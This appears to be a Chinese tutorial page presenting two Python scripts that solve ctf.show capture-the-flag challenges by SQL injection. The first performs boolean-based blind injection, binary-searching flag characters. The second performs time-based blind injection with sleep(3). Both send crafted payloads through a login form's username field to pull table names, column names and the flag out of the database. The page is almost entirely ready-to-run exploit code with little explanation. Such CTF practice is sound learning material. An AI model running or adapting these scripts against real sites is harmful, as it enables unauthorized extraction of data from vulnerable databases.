Java教程
SQL注入-2
本文主要是介绍SQL注入-2,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
简单盲注
import requests
import time
result = ""
url = 'http://986b6ffa-086c-4650-8237-9557e9bd100c.challenge.ctf.show/api/'
for i in range(80):
min_num = 32
max_num = 127
while True:
mid_num = (min_num + max_num) >> 1
if mid_num == min_num:
result += chr(mid_num)
print(result)
break
# table_name = ctfshow_fl0g,ctfshow_user
# column_name = id,f1ag
# payload = "admin' and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_user'),{},1))<{}#".format(i, mid_num)
payload = "admin' and ascii(substr((select f1ag from ctfshow_fl0g),{},1))<{}#".format(i, mid_num)
data = {
'username': payload,
'password': 0
}
response = requests.post(url, data=data)
time.sleep(0.25)
if response.text.find('8bef') > 0:
max_num = mid_num
else:
min_num = mid_num
简单时间盲注
import requests
import time
dic = ' ,ctfshow{}abdegijklmnpqruvxyz0123456789-_{}ABCDEFGHIJKLMNOPQRSTUVWXYZ'
url = 'http://414da80d-977f-4f64-baf7-5a7adbebb60a.challenge.ctf.show/api/'
result = ''
for i in range(1, 60):
for word in dic:
# payload = "admin' and if(left(database(),{0})='{1}',sleep(3),0)#".format(i, result + word)
# payload = "admin' and if(left((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),{0})='{1}',sleep(3),0)#".format(i, result + word)
# payload = "admin' and if(left((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flxg'),{})='{}',sleep(3),0)#".format(i, result + word)
payload = "admin' and if(left((select f1ag from ctfshow_flxg),{})='{}',sleep(3),0)#".format(i, result + word)
data = {
'username': payload,
'password': 0
}
try:
response = requests.post(url, data=data, timeout=2.5)
time.sleep(0.25)
except:
result += word
print(result)
break
这篇关于SQL注入-2的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
数据结构与算法教程:初学者必备指南11-04
-
搜索算法教程:初学者必看指南11-04
-
算法八股文教程:新手入门指南11-04
-
算法复杂度教程:入门与实践指南11-04
-
算法高级教程:新手入门与初级提升指南11-04
-
初学者的算法教程:轻松入门算法世界11-04
-
算法面试教程:零基础入门与实战技巧11-04
-
算法设计思路教程:新手入门详解11-04
-
优先队列进阶:从入门到初步掌握11-04
-
DP优化进阶:从入门到初级提升指南11-04
-
八皇后教程:初学者必看的简单指南11-04
-
并查集教程:初学者必备指南11-04
-
大厂数据结构与算法教程:适合入门与初级用户的学习指南11-04
-
大厂算法教程:新手入门必备指南11-04
-
大厂算法与数据结构教程:入门必备11-04
栏目导航
